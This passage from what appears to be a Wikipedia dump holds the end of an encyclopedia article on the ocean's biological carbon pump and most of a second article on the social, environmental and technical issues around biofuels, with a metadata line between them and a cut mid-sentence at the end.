cycle that regulates atmospheric CO2 levels) transfers both organic and inorganic carbon fixed by primary producers (phytoplankton) in the euphotic zone to the ocean interior and subsequently to the underlying sediments. Thus, the biological pump takes carbon out of contact with the atmosphere for several thousand years or longer and maintains atmospheric CO2 at significantly lower levels than would be the case if it did not exist. An ocean without a biological pump, which transfers roughly 11 Gt C yr−1 into the ocean's interior, would result in atmospheric CO2 levels ~400 ppm higher than present day. Passow and Carlson defined sedimentation out of the surface layer (at approximately 100 m depth) as the "export flux" and that out of the mesopelagic zone (at approximately 1000 m depth) as the "sequestration flux". Once carbon is transported below the mesopelagic zone, it remains in the deep sea for 100 years or longer, hence the term "sequestration" flux. According to the modelling results of Buesseler and Boyd between 1% and 40% of the primary production is exported out of the euphotic zone, which attenuates exponentially towards the base of the mesopelagic zone and only about 1% of the surface production reaches the sea floor. The export efficiency of particulate organic carbon (POC) shows regional variability. For instance, in the North Atlantic, over 40% of net primary production is exported out of the euphotic zone as compared to only 10% in the South Pacific, and this is driven in part by the composition of the phytoplankton community including cell size and composition (see below). Exported organic carbon is remineralized, that is, respired back to CO2 in the oceanic water column at depth, mainly by heterotrophic microbes and zooplankton. Thus, the biological carbon pump maintains a vertical gradient in the concentration of dissolved inorganic carbon (DIC), with higher values at increased ocean depth. This deep-ocean DIC returns to the atmosphere on millennial timescales through thermohaline circulation. In 2001, Hugh et al. expressed the efficiency of the biological pump as the amount of carbon exported from the surface layer (export production) divided by the total amount produced by photosynthesis (overall production). Modelling studies by Buesseler and Boyd revealed that the overall transfer efficiency of the biological pump is determined by a combination of factors: seasonality; the composition of phytoplankton species; the fragmentation of particles by zooplankton; and the solubilization of particles by microbes. In addition, the efficiency of the biological pump is also dependent on the aggregation and disaggregation of organic-rich aggregates and interaction between POC aggregates and suspended "ballast" minerals. Ballast minerals (silicate and carbonate biominerals and dust) are the major constituents of particles that leave the ocean surface via sinking. They are typically denser than seawater and most organic matter, thus, providing a large part of the density differential needed for sinking of the particles. Aggregation of particles increases vertical flux by transforming small suspended particles into larger, rapidly-sinking ones. It plays an important role in the sedimentation of phytodetritus from surface layer phytoplankton blooms. As illustrated by Turner in 2015, the vertical flux of sinking particles is mainly due to a combination of fecal pellets, marine snow and direct sedimentation of phytoplankton blooms, which are typically composed of diatoms, coccolithophorids, dinoflagellates and other plankton. Marine snow comprises macroscopic organic aggregates >500 μm in size and originates from clumps of aggregated phytoplankton (phytodetritus), discarded appendicularian houses, fecal matter and other miscellaneous detrital particles, Appendicularians secrete mucous feeding structures or "houses" to collect food particles and discard and renew them up to 40 times a day . Discarded appendicularian houses are highly abundant (thousands per m3 in surface waters) and are microbial hotspots with high concentrations of bacteria, ciliates, flagellates and phytoplankton. These discarded houses are therefore among the most important sources of aggregates directly produced by zooplankton in terms of carbon cycling potential. The composition of the phytoplankton community in the euphotic zone largely determines the quantity and quality of organic matter that sinks to depth. The main functional groups of marine phytoplankton that contribute to export production include nitrogen fixers (diazotrophic cyanobacteria), silicifiers (diatoms) and calcifiers (coccolithophores). Each of these phytoplankton groups differ in the size and composition of their cell walls and coverings, which influence their sinking velocities. For example, autotrophic picoplankton (0.2–2 μm in diameter)—which include taxa such as cyanobacteria (e.g., Prochlorococcus spp. and Synechococcus spp.) and prasinophytes (various genera of eukaryotes <2 μm)—are believed to contribute much less to carbon export from surface layers due to their small size, slow sinking velocities (<0.5 m/day) and rapid turnover in the microbial loop. In contrast, larger phytoplankton cells such as diatoms (2–500 μm in diameter) are very efficient in transporting carbon to depth by forming rapidly sinking aggregates. They are unique among phytoplankton, because they require Si in the form of silicic acid (Si(OH)4) for growth and production of their frustules, which are made of biogenic silica (bSiO2) and act as ballast. According to the reports of Miklasz and Denny, the sinking velocities of diatoms can range from 0.4 to 35 m/day. Analogously, coccolithophores are covered with calcium carbonate plates called 'coccoliths', which are central to aggregation and ballasting, producing sinking velocities of nearly 5 m/day. Although it has been assumed that picophytoplankton, characterizing vast oligotrophic areas of the ocean, do not contribute substantially to the particulate organic carbon (POC) flux, in 2007 Richardson and Jackson suggested that all phytoplankton, including picoplankton cells, contribute equally to POC export. They proposed alternative pathways for picoplankton carbon cycling, which rely on aggregation as a mechanism for both direct sinking (the export of picoplankton as POC) and mesozooplankton- or large filter feeder-mediated sinking of picoplankton-based production. Zooplankton grazing Sloppy feeding In addition to linking primary producers to higher trophic levels in marine food webs, zooplankton also play an important role as "recyclers" of carbon and other nutrients that significantly impact marine biogeochemical cycles, including the biological pump. This is particularly the case with copepods and krill, and is especially important in oligotrophic waters of the open ocean. Through sloppy feeding, excretion, egestion, and leaching of fecal pellets, zooplankton release dissolved organic matter (DOM) which controls DOM cycling and supports the microbial loop. Absorption efficiency, respiration, and prey size all further complicate how zooplankton are able to transform and deliver carbon to the deep ocean. Excretion and sloppy feeding (the physical breakdown of food source) make up 80% and 20% of crustacean zooplankton-mediated DOM release respectively. In the same study, fecal pellet leaching was found to be an insignificant contributor. For protozoan grazers, DOM is released primarily through excretion and egestion and gelatinous zooplankton can also release DOM through the production of mucus. Leaching of fecal pellets can extend from hours to days after initial egestion and its effects can vary depending on food concentration and quality. Various factors can affect how much DOM is released from zooplankton individuals or populations. Fecal pellets The fecal pellets of zooplankton can be important vehicles for the transfer of particulate organic carbon (POC) to the deep ocean, often making large contributions to the carbon sequestration. The size distribution of the copepod community indicates high numbers of small fecal pellets are produced in the epipelagic. However, small fecal pellets are rare in the deeper layers, suggesting they are not transferred efficiently to depth. This means small fecal pellets make only minor contributions to fecal pellet fluxes in the meso- and bathypelagic, particularly in terms of carbon. In a study is focussed on the Scotia Sea, which contains some of the most productive regions in the Southern Ocean, the dominant fecal pellets in the upper mesopelagic were cylindrical and elliptical, while ovoid fecal pellets were dominant in the bathypelagic. The change in fecal pellet morphology, as well as size distribution, points to the repacking of surface fecal pellets in the mesopelagic and in situ production in the lower meso- and bathypelagic, which may be augmented by inputs of fecal pellets via zooplankton vertical migrations. This suggests the flux of carbon to the deeper layers within the Southern Ocean is strongly modulated by meso- and bathypelagic zooplankton, meaning that the community structure in these zones has a major impact on the efficiency of the fecal pellet transfer to ocean depths. Absorption efficiency (AE) is the proportion of food absorbed by plankton that determines how available the consumed organic materials are in meeting the required physiological demands. Depending on the feeding rate and prey composition, variations in AE may lead to variations in fecal pellet production, and thus regulates how much organic material is recycled back to the marine environment. Low feeding rates typically lead to high AE and small, dense pellets, while high feeding rates typically lead to low AE and larger pellets with more organic content. Another contributing factor to DOM release is respiration rate. Physical factors such as oxygen availability, pH, and light conditions may affect overall oxygen consumption and how much carbon is loss from zooplankton in the form of respired CO2. The relative sizes of zooplankton and prey also mediate how much carbon is released via sloppy feeding. Smaller prey are ingested whole, whereas larger prey may be fed on more "sloppily", that is more biomatter is released through inefficient consumption. There is also evidence that diet composition can impact nutrient release, with carnivorous diets releasing more dissolved organic carbon (DOC) and ammonium than omnivorous diets. Microbial loop Bacterial lysis The microbial loop describes a trophic pathway in the marine microbial food web where dissolved organic carbon (DOC) is returned to higher trophic levels via its incorporation into bacterial biomass, and then coupled with the classic food chain formed by phytoplankton-zooplankton-nekton. The term microbial loop was coined by Farooq Azam, Tom Fenchel et al. in 1983 to include the role played by bacteria in the carbon and nutrient cycles of the marine environment. In general, dissolved organic carbon is introduced into the ocean environment from bacterial lysis, the leakage or exudation of fixed carbon from phytoplankton (e.g., mucilaginous exopolymer from diatoms), sudden cell senescence, sloppy feeding by zooplankton, the excretion of waste products by aquatic animals, or the breakdown or dissolution of organic particles from terrestrial plants and soils. Bacteria in the microbial loop decompose this particulate detritus to utilize this energy-rich matter for growth. Since more than 95% of organic matter in marine ecosystems consists of polymeric, high molecular weight (HMW) compounds (e.g., protein, polysaccharides, lipids), only a small portion of total dissolved organic matter (DOM) is readily utilizable to most marine organisms at higher trophic levels. This means that dissolved organic carbon is not available directly to most marine organisms; marine bacteria introduce this organic carbon into the food web, resulting in additional energy becoming available to higher trophic levels. Viral shunt As much as 25% of the primary production from phytoplankton in the global oceans may be recycled within the microbial loop through viral shunting. The viral shunt is a mechanism whereby marine viruses prevent microbial particulate organic matter (POM) from migrating up trophic levels by recycling them into dissolved organic matter (DOM), which can be readily taken up by microorganisms. The DOM recycled by the viral shunt pathway is comparable to the amount generated by the other main sources of marine DOM. Viruses can easily infect microorganisms in the microbial loop due to their relative abundance compared to microbes. Prokaryotic and eukaryotic mortality contribute to carbon nutrient recycling through cell lysis. There is evidence as well of nitrogen (specifically ammonium) regeneration. This nutrient recycling helps stimulates microbial growth. Macroorganisms Jelly fall Jelly-falls are marine carbon cycling events whereby gelatinous zooplankton, primarily cnidarians, sink to the seafloor and enhance carbon and nitrogen fluxes via rapidly sinking particulate organic matter. These events provide nutrition to benthic megafauna and bacteria. Jelly-falls have been implicated as a major "gelatinous pathway" for the sequestration of labile biogenic carbon through the biological pump. These events are common in protected areas with high levels of primary production and water quality suitable to support cnidarian species. These areas include estuaries and several studies have been conducted in fjords of Norway. Whale pump Whales and other marine mammals also enhance primary productivity in their feeding areas by concentrating nitrogen near the surface through the release of flocculent fecal plumes. For example, whales and seals may be responsible for replenishing more nitrogen in the Gulf of Maine's euphotic zone than the input of all rivers combined. This upward whale pump played a much larger role before industrial fishing devastated marine mammal stocks, when recycling of nitrogen was likely more than three times the atmospheric nitrogen input. The biological pump mediates the removal of carbon and nitrogen from the euphotic zone through the downward flux of aggregates, feces, and vertical migration of invertebrates and fish. Copepods and other zooplankton produce sinking fecal pellets and contribute to downward transport of dissolved and particulate organic matter by respiring and excreting at depth during migration cycles, thus playing an important role in the export of nutrients (N, P, and Fe) from surface waters. Zooplankton feed in the euphotic zone and export nutrients via sinking fecal pellets, and vertical migration. Fish typically release nutrients at the same depth at which they feed. Excretion for marine mammals, tethered to the surface for respiration, is expected to be shallower in the water column than where they feed. Marine mammals provide important ecosystem services. On a global scale, they can influence climate, through fertilization events and the export of carbon from surface waters to the deep sea through sinking whale carcasses. In coastal areas, whales retain nutrients locally, increasing ecosystem productivity and perhaps raising the carrying capacity for other marine consumers, including commercial fish species. It has been estimated that, in terms of carbon sequestration, one whale is equivalent to thousands of trees. Vertical migrations Diel vertically migrating krill, salps, smaller zooplankton and fish can actively transport carbon to depth by consuming POC in the surface layer at night, and metabolising it at their daytime, mesopelagic residence depths. Depending on species life history, active transport may occur on a seasonal basis as well. Without vertical migration the biological pump wouldn't be nearly as efficient. Organisms migrate up to feed at night so when they migrate back to depth during the day they defecate large sinking fecal pellets. Whilst some larger fecal pellets can sink quite fast, the speed that organisms move back to depth is still faster. At night organisms are in the top 100 metres of the water column, but during the day they move down to between 800 and 1000 metres. If organisms were to defecate at the surface it would take the fecal pellets days to reach the depth that they reach in a matter of hours. Therefore, by releasing fecal pellets at depth they have almost 1000 metres less to travel to get to the deep ocean. This is something known as active transport. The organisms are playing a more active role in moving organic matter down to depths. Because a large majority of the deep sea, especially marine microbes, depends on nutrients falling down, the quicker they can reach the ocean floor the better. Zooplankton and salps play a large role in the active transport of fecal pellets. 15–50% of zooplankton biomass is estimated to migrate, accounting for the transport of 5–45% of particulate organic nitrogen to depth. Salps are large gelatinous plankton that can vertically migrate 800 metres and eat large amounts of food at the surface. They have a very long gut retention time, so fecal pellets usually are released at maximum depth. Salps are also known for having some of the largest fecal pellets. Because of this they have a very fast sinking rate, small detritus particles are known to aggregate on them. This makes them sink that much faster. So while currently there is still much research being done on why organisms vertically migrate, it is clear that vertical migration plays a large role in the active transport of dissolved organic matter to depth. Lipid pump The lipid pump sequesters carbon from the ocean's surface to deeper waters via lipids associated with overwintering vertically migratory zooplankton. Lipids are a class of hydrocarbon rich, nitrogen and phosphorus deficient compounds essential for cellular structures. The lipid associated carbon enters the deep ocean as carbon dioxide produced by respiration of lipid reserves and as organic matter from the mortality of zooplankton. Compared to the more general biological pump, the lipid pump also results in a lipid shunt, where other nutrients like nitrogen and phosphorus that are consumed in excess must be excreted back to the surface environment, and thus are not removed from the surface mixed layer of the ocean. This means that the carbon transported by the lipid pump does not limit the availability of essential nutrients in the ocean surface. Carbon sequestration via the lipid pump is therefore decoupled from nutrient removal, allowing carbon uptake by oceanic primary production to continue. In the Biological Pump, nutrient removal is always coupled to carbon sequestration; primary production is limited as carbon and nutrients are transported to depth together in the form of organic matter. The contribution of the lipid pump to the sequestering of carbon in the deeper waters of the ocean can be substantial: the carbon transported below 1,000 metres (3,300 ft) by copepods of the genus Calanus in the Arctic Ocean almost equals that transported below the same depth annually by particulate organic carbon (POC) in this region. A significant fraction of this transported carbon would not return to the surface due to respiration and mortality. Research is ongoing to more precisely estimate the amount that remains at depth. The export rate of the lipid pump may vary from 1–9.3 g C m−2 y−1 across temperate and subpolar regions containing seasonally-migrating zooplankton. The role of zooplankton, and particularly copepods, in the food web is crucial to the survival of higher trophic level organisms whose primary source of nutrition is copepods. With warming oceans and increasing melting of ice caps due to climate change, the organisms associated with the lipid pump may be affected, thus influencing the survival of many commercially important fish and endangered marine mammals. As a new and previously unquantified component of oceanic carbon sequestration, further research on the lipid pump can improve the accuracy and overall understanding of carbon fluxes in global oceanic systems. Bioluminescent shunt Luminous bacteria in light organ symbioses are successively acquired by host (squid, fish) from the seawater while they are juveniles, then regularly released into the ocean. In the diagram on the right, depending on the light organ position, luminous bacteria are released from their guts into fecal pellets or directly into the seawater (step 1). Motile luminous bacteria colonize organic matter sinking along the water column. Bioluminescent bacteria colonising fecal pellets and particles influence zooplankton consumption rates. Such visual markers increase detection ("bait hypothesis"), attraction and finally predation by upper trophic levels (step 2). In the mesopelagic, zooplankton and their predators feed on sinking luminous particles and fecal pellets, which form either aggregates (repackaging) of faster sinking rates or fragment organic matter (due to sloppy feeding) with slower sinking rates (step 3). Filter feeders also aggregate sinking organic matter without particular visual detection and selection of luminous matter. Diel (and seasonal) vertical migrators feeding on luminous food metabolize and release glowing fecal pellets from the surface to the mesopelagic zone (step 4). This implies bioluminescent bacteria dispersion at large spatial scales, for zooplankton or even some fish actively swimming long distances. Luminous bacteria attached to particles sink down to the seafloor, and sediment can be resuspended by oceanographic physical conditions (step 5) and consumed by epi-benthic organisms. Instruments are (a) plankton net, (b) fish net, (c) Niskin water sampler, (d) bathyphotometer, (e) sediment traps, (f) autonomous underwater vehicles, (g) photomultiplier module, (h) astrophysics optical modules ANTARES and (i–j) remotely operated vehicles. Quantification The geologic component of the carbon cycle operates slowly in comparison to the other parts of the global carbon cycle. It is one of the most important determinants of the amount of carbon in the atmosphere, and thus of global temperatures. As the biological pump plays an important role in the Earth's carbon cycle, significant effort is spent quantifying its strength. However, because they occur as a result of poorly constrained ecological interactions usually at depth, the processes that form the biological pump are difficult to measure. A common method is to estimate primary production fuelled by nitrate and ammonium as these nutrients have different sources that are related to the remineralisation of sinking material. From these it is possible to derive the so-called f-ratio, a proxy for the local strength of the biological pump. Applying the results of local studies to the global scale is complicated by the role the ocean's circulation plays in different ocean regions. Effects of climate change Changes in land use, the combustion of fossil fuels, and the production of cement have led to an increase in CO2 concentration in the atmosphere. At present, about one third (approximately 2 Pg C y−1 = 2 × 1015 grams of carbon per year) of anthropogenic emissions of CO2 may be entering the ocean, but this is quite uncertain. Some research suggests that a link between elevated CO2 and marine primary production exists. Climate change may affect the biological pump in the future by warming and stratifying the surface ocean. It is believed that this could decrease the supply of nutrients to the euphotic zone, reducing primary production there. Also, changes in the ecological success of calcifying organisms caused by ocean acidification may affect the biological pump by altering the strength of the hard tissues pump. This may then have a "knock-on" effect on the soft tissues pump because calcium carbonate acts to ballast sinking organic material. The second diagram on the right shows some possible effects of sea ice decline and permafrost thaw on Arctic carbon fluxes. On land, plants take up carbon while microorganisms in the soil produce methane and respire CO2. Lakes are net emitters of methane, and organic and inorganic carbon (dissolved and particulate) flow into the ocean through freshwater systems. In the ocean, methane can be released from thawing subsea permafrost, and CO2 is absorbed due to an undersaturation of CO2 in the water compared with the atmosphere. In addition, multiple fluxes are closely associated to sea ice. Current best estimates of atmospheric fluxes are given in Tg C year−1, where available. Note that the emission estimate for lakes is for the area North of ~50º N rather than the narrower definition of arctic tundra for the other terrestrial fluxes. When available, uncertainty ranges are shown in brackets. The arrows do not represent the size of each flux. The biological pump is thought to have played significant roles in atmospheric CO2 fluctuations during past glacial-interglacial periods. However, it is not yet clear how the biological pump will respond to future climate change. For such predictions to be reasonable, it is important to first decipher the response of phytoplankton, one of the key components of the biological pump to future changes in atmospheric CO2. Due to their phylogenetic diversity, different phytoplankton taxa will likely respond to climate change in different ways. For instance, a decrease in the abundance of diatom is expected due to increased stratification in the future ocean. Diatoms are highly efficient in transporting carbon to depths by forming large, rapidly sinking aggregates and their reduced numbers could in turn lead to decreased carbon export. Further, decreased ocean pH due to ocean acidification may thwart the ability of coccolithophores to generate calcareous plates, potentially affecting the biological pump; however, it appears that some species are more sensitive than others. Thus, future changes in the relative abundance of these or other phytoplankton taxa could have a marked impact on total ocean productivity, subsequently affecting ocean biogeochemistry and carbon storage. A 2015 study determined that coccolithophore concentrations in the North Atlantic have increased by an order of magnitude since the 1960s and an increase in absorbed CO2, as well as temperature, were modeled to be the most likely cause of this increase. In a 2017 study, scientists used species distribution modelling (SDM) to predict the future global distribution of two phytoplankton species important to the biological pump: the diatom Chaetoceros diadema and the coccolithophore Emiliania huxleyi. They employed environmental data described in the IPCC Representative Concentration Pathways scenario 8.5, which predicts radiative forcing in the year 2100 relative to pre-industrial values. Their modelling results predicted that the total ocean area covered by C. diadema and E. huxleyi would decline by 8% and 16%, respectively, under the examined climate scenario. They predicted changes in the range and distribution of these two phytoplankton species under these future ocean conditions, if realized, might result in reduced contribution to carbon sequestration via the biological pump. In 2019, a study indicated that at current rates of seawater acidification, we could see Antarctic phytoplanktons smaller and less effective at storing carbon before the end of the century. Monitoring Monitoring the biological pump is critical to understanding how the Earth's carbon cycle is changing. A variety of techniques are used to monitor the biological pump, which can be deployed from various platforms such as ships, autonomous vehicles, and satellites. At present, satellite remote sensing is the only tool available for viewing the entire surface ocean at high temporal and spatial scales. Needed research Multidisciplinary observations are still needed in the deep water column to properly understand the biological pump: Physics: stratification affects particle sinking; understanding the origin of the particles and the residence time of the DIC from particle remineralization in the deep ocean requires measurement of advection and mixing. Biogeochemistry: export/mixing down of particulate and dissolved organic matter from the surface layer determines labile organic matter arriving at the seafloor, which is either respired by seafloor biota or stored for longer times in the sediment. Biology and ecosystems: zooplankton and microorganisms break down and remineralize sinking particles in the water column. Exported organic matter feeds all water column and benthic biota (zooplankton, benthic invertebrates, microbes) sustaining their biomass, density, and biodiversity. See also f-ratio (oceanography) Lysocline Mooring (oceanography) Apparent oxygen utilisation References Aquatic ecology Biological oceanography Carbon cycle Chemical oceanography
Biological pump
Chemistry,Biology
12,634
19,242,924
https://en.wikipedia.org/wiki/Issues%20relating%20to%20biofuels
Issues relating to biofuel are social, economic, environmental and technical problems that may arise from biofuel production and use. Social and economic issues include the "food vs fuel" debate and the need to develop responsible policies and economic instruments to ensure sustainable biofuel production. Farming for biofuels feedstock can be detrimental to the environment if not done sustainably. Environmental concerns include deforestation, biodiversity loss and soil erosion as a result of land clearing for biofuels agriculture. While biofuels can contribute to reduction in global carbon emissions, indirect land use change for biofuel production can have the inverse effect. Technical issues include possible modifications necessary to run the engine on biofuel, as well as energy balance and efficiency. The International Resource Panel outlined the wider and interrelated factors that need to be considered when deciding on the relative merits of pursuing one biofuel over another. The IRP concluded that not all biofuels perform equally in terms of their effect on climate, energy security and ecosystems, and suggested that environmental and social effects need to be assessed throughout the entire life-cycle. Social and economic effects Oil price moderation The International Energy Agency's World Energy Outlook 2006 concludes that rising oil demand, if left unchecked, would accentuate the consuming countries' vulnerability to a severe supply disruption and resulting price shock. The report suggested that biofuels may one day offer a viable alternative, but also that "the implications of the use of biofuels for global security as well as for economic, environmental, and public health need to be further evaluated". According to Francisco Blanch, a commodity strategist for Merrill Lynch, crude oil would be trading 15 per cent higher and gasoline would be as much as 25 per cent more expensive, if it were not for biofuels. Gordon Quaiattini, president of the Canadian Renewable Fuels Association, argued that a healthy supply of alternative energy sources will help to combat gasoline price spikes. "Food vs. fuel" debate Food vs fuel is the debate regarding the risk of diverting farmland or crops for biofuels production in detriment of the food supply on a global scale. Essentially the debate refers to the possibility that by farmers increasing their production of these crops, often through government subsidy incentives, their time and land is shifted away from other types of non-biofuel crops driving up the price of non-biofuel crops due to the decrease in production. Therefore, it is not only that there is an increase in demand for the food staples, like corn and cassava, that sustain the majority of the world's poor but this also has the potential to increase the price of the remaining crops that these individuals would otherwise need to utilize to supplement their diets. A recent study for the International Centre for Trade and Sustainable Development shows that market-driven expansion of ethanol in the US increased maize prices by 21 percent in 2009, in comparison with what prices would have been had ethanol production been frozen at 2004 levels. A November 2011 study states that biofuels, their production, and their subsidies are leading causes of agricultural price shocks. The counter-argument includes considerations of the type of corn that is utilized in biofuels, often field corn not suitable for human consumption; the portion of the corn that is used in ethanol, the starch portion; and the negative effect higher prices for corn and grains have on government welfare for these products. The "food vs. fuel" or "food or fuel" debate is internationally controversial, with disagreement about how significant this is, what is causing it, what the effect is, and what can or should be done about it. The world is facing three global crises, energy, food and environment. Changing the trend of recreation or population growth can impact each one of these. By increasing the world population, the ratio of energy and food demands will increase as well. So, it can put these two energy and food industries in completion of supplying. Developing the techniques and utilizing the food crops for biofuel production, especially in shortage areas, can adverse the competition between the food and biofuel industries. It can be cay that harvesting and producing biofuels crop on a large scale can put local food communities at risk, such as challenges to access lands and portions of the food. If the food economy cannot place safe and stable, protocols such as Kyoto can not meet their purposes and help control emissions. Poverty reduction Researchers at the Overseas Development Institute have argued that biofuels could help to reduce poverty in the developing world, through increased employment, wider economic growth multipliers and by stabilising oil prices (many developing countries are net importers of oil). However, this potential is described as 'fragile', and is reduced where feedstock production tends to be large scale, or causes pressure on limited agricultural resources: capital investment, land, water, and the net cost of food for the poor. With regards to the potential for poverty reduction or exacerbation, biofuels rely on many of the same policy, regulatory or investment shortcomings that impede agriculture as a route to poverty reduction. Since many of these shortcomings require policy improvements at a country level rather than a global one, they argue for a country-by-country analysis of the potential poverty effects of biofuels. This would consider, among other things, land administration systems, market coordination and prioritizing investment in biodiesel, as this 'generates more labour, has lower transportation costs and uses simpler technology'. Also necessary are reductions in the tariffs on biofuel imports regardless of the country of origin, especially due to the increased efficiency of biofuel production in countries such as Brazil. Sustainable biofuel production Responsible policies and economic instruments would help to ensure that biofuel commercialization, including the development of new cellulosic technologies, is sustainable. Responsible commercialization of biofuels represents an opportunity to enhance sustainable economic prospects in Africa, Latin America and impoverished Asia. Environmental effects Soil erosion and deforestation Large-scale deforestation of mature trees (which help remove CO2 through photosynthesis — much better than sugar cane or most other biofuel feedstock crops do) contributes to soil erosion, un-sustainable global warming atmospheric greenhouse gas levels, loss of habitat, and a reduction of valuable biodiversity (both on land as in oceans). Demand for biofuel has led to clearing land for palm oil plantations. In Indonesia alone, over of forest have been converted to plantations since 1996. A portion of the biomass should be retained onsite to support the soil resource. Normally this will be in the form of raw biomass, but processed biomass is also an option. If the exported biomass is used to produce syngas, the process can be used to co-produce biochar, a low-temperature charcoal used as a soil amendment to increase soil organic matter to a degree not practical with less recalcitrant forms of organic carbon. For co-production of biochar to be widely adopted, the soil amendment and carbon sequestration value of co-produced charcoal must exceed its net value as a source of energy. Some commentators claim that removal of additional cellulosic biomass for biofuel production will further deplete soils. Effect on water resources Increased use of biofuels puts increasing pressure on water resources in at least two ways: water use for the irrigation of crops used as feedstocks for biodiesel production; and water use in the production of biofuels in refineries, mostly for boiling and cooling. In many parts of the world supplemental or full irrigation is needed to grow feedstocks. For example, if in the production of corn (maize) half the water needs of crops are met through irrigation and the other half through rainfall, about 860 liters of water are needed to produce one liter of ethanol. However, in the United States only 5-15% of the water required for corn comes from irrigation while the other 85-95% comes from natural rainfall. In the United States, the number of ethanol factories has almost tripled from 50 in 2000 to about 140 in 2008. A further 60 or so are under construction, and many more are planned. Projects are being challenged by residents at courts in Missouri (where water is drawn from the Ozark Aquifer), Iowa, Nebraska, Kansas (all of which draw water from the non-renewable Ogallala Aquifer), central Illinois (where water is drawn from the Mahomet Aquifer) and Minnesota. For example, the four ethanol crops: corn, sugarcane, sweet sorghum and pine yield net energy. However, increasing production in order to meet the U.S. Energy Independence and Security Act mandates for renewable fuels by 2022 would take a heavy toll in the states of Florida and Georgia. The sweet sorghum, which performed the best of the four, would increase the amount of freshwater withdrawals from the two states by almost 25%. Pollution Formaldehyde, acetaldehyde and other aldehydes are produced when alcohols are oxidized. When only a 10% mixture of ethanol is added to gasoline (as is common in American E10 gasohol and elsewhere), aldehyde emissions increase 40%. Some study results are conflicting on this fact however, and lowering the sulfur content of biofuel mixes lowers the acetaldehyde levels. Burning biodiesel also emits aldehydes and other potentially hazardous aromatic compounds which are not regulated in emissions laws. Many aldehydes are toxic to living cells. Formaldehyde irreversibly cross-links protein amino acids, which produces the hard flesh of embalmed bodies. At high concentrations in an enclosed space, formaldehyde can be a significant respiratory irritant causing nose bleeds, respiratory distress, lung disease, and persistent headaches. Acetaldehyde, which is produced in the body by alcohol drinkers and found in the mouths of smokers and those with poor oral hygiene, is carcinogenic and mutagenic. The European Union has banned products that contain formaldehyde, due to its documented carcinogenic characteristics. The U.S. Environmental Protection Agency has labeled Formaldehyde as a probable cause of cancer in humans. Brazil burns significant amounts of ethanol biofuel. Gas chromatograph studies were performed of ambient air in São Paulo, Brazil, and compared to Osaka, Japan, which does not burn ethanol fuel. Atmospheric Formaldehyde was 160% higher in Brazil, and Acetaldehyde was 260% higher. Technical issues Energy efficiency and energy balance Despite its occasional proclamation as a "green" fuel, first-generation biofuels, primarily ethanol, are not without their own GHG emissions. While ethanol does produce fewer overall GHG emissions than gasoline, its production is still an energy intensive process with secondary effects. Gasoline generally produces 8.91 kg per gallon, compared to 8.02 kg per gallon for E10 ethanol and 1.34 kg per gallon for E85 ethanol. Based on a study by Dias de Oliveira et al. (2005), corn-based ethanol requires 65.02 gigajoules (GJ) of energy per hectare (ha) and produces approximately 1236.72 kg per ha of carbon dioxide (), while sugar cane-based ethanol requires 42.43 GJ/ha and produces 2268.26 kg/ha of under the assumption of non-carbon neutral energy production. These emissions accrue from agricultural production, crop cultivation, and ethanol processing. Once the ethanol is blended with gasoline, it results in carbon-savings of approximately 0.89 kg of per gallon consumed (U.S. D.O.E., 2011a). Economic viability From a production standpoint, miscanthus can produce 742 gallons of ethanol per acre of land, which is nearly twice as much as corn (399 gal/acre, assuming average yield of 145 bushels per acre under normal corn-soybean rotation) and nearly three times as much as corn stover (165 gal/acre) and switchgrass (214 gal/acre). Production costs are a big impediment to large-scale implementation of 2nd Generation bio-fuels, and their market demand will depend primarily on their price competitiveness relative to corn ethanol and gasoline. At this time, costs of conversion of cellulosic fuels, at $1.46 per gallon, were roughly twice that of corn-based ethanol, at $0.78 per gallon. Cellulosic biofuels from corn stover and miscanthus were 24% and 29% more expensive than corn ethanol, respectively, and switchgrass biofuel is more than twice as expensive as corn ethanol. Carbon emissions Biofuels and other forms of renewable energy aim to be carbon neutral or even carbon negative. Carbon neutral means that the carbon released during the use of the fuel, e.g. through burning to power transport or generate electricity, is reabsorbed and balanced by the carbon absorbed by new plant growth. These plants are then harvested to make the next batch of fuel. Carbon neutral fuels lead to no net increases in human contributions to atmospheric carbon dioxide levels, reducing the human contributions to global warming. A carbon negative aim is achieved when a portion of the biomass is used for carbon sequestration. Calculating exactly how much greenhouse gas (GHG) is produced in burning biofuels is a complex and inexact process, which depends very much on the method by which the fuel is produced and other assumptions made in the calculation. The carbon emissions (carbon footprint) produced by biofuels are calculated using a technique called Life Cycle Analysis (LCA). This uses a "cradle to grave" or "well to wheels" approach to calculate the total amount of carbon dioxide and other greenhouse gases emitted during biofuel production, from putting seed in the ground to using the fuel in cars and trucks. Many different LCAs have been done for different biofuels, with widely differing results. Several well-to-wheel analysis for biofuels has shown that first generation biofuels can reduce carbon emissions, with savings depending on the feedstock used, and second generation biofuels can produce even higher savings when compared to using fossil fuels. However, those studies did not take into account emissions from nitrogen fixation, or additional carbon emissions due to indirect land use changes. In addition, many LCA studies fail to analyze the effect of substitutes that may come into the market to replace current biomass-based products. In the case of Crude Tall Oil, a raw material used in the production of pine chemicals and now being diverted for use in biofuel, an LCA study found that the global carbon footprint of pine chemicals produced from CTO is 50 percent lower than substitute products used in the same situation offsetting any gains from utilizing a biofuel to replace fossil fuels. Additionally the study showed that fossil fuels are not reduced when CTO is diverted to biofuel use and the substitute products consume disproportionately more energy. This diversion will negatively affect an industry that contributes significantly to the world economy, globally producing more than 3 billion pounds of pine chemicals annually in complex, high technology refineries and providing jobs directly and indirectly for tens of thousands of workers. A paper published in February 2008 in Sciencexpress by a team led by Searchinger from Princeton University concluded that once considered indirect land use changes effects in the life cycle assessment of biofuels used to substitute gasoline, instead of savings both corn and cellulosic ethanol increased carbon emissions as compared to gasoline by 93 and 50 percent respectively. A second paper published in the same issue of Sciencexpress, by a team led by Fargione from The Nature Conservancy, found that a carbon debt is created when natural lands are cleared and being converted to biofuel production and to crop production when agricultural land is diverted to biofuel production, therefore this carbon debt applies to both direct and indirect land use changes. The Searchinger and Fargione studies gained prominent attention in both the popular media and in scientific journals. The methodology, however, drew some criticism, with Wang and Haq from Argonne National Laboratory posted a public letter and send their criticism about the Searchinger paper to Letters to Science. Another criticism by Kline and Dale from Oak Ridge National Laboratory was published in Letters to Science. They argued that Searchinger et al. and Fargione et al. "...do not provide adequate support for their claim that biofuels cause high emissions due to land-use change. The U.S. biofuel industry also reacted, claiming in a public letter, that the "Searchinger study is clearly a "worst-case scenario" analysis..." and that this study "relies on a long series of highly subjective assumptions...". Engine design The modifications necessary to run internal combustion engines on biofuel depend on the type of biofuel used, as well as the type of engine used. For example, gasoline engines can run without any modification at all on biobutanol. Minor modifications are however needed to run on bioethanol 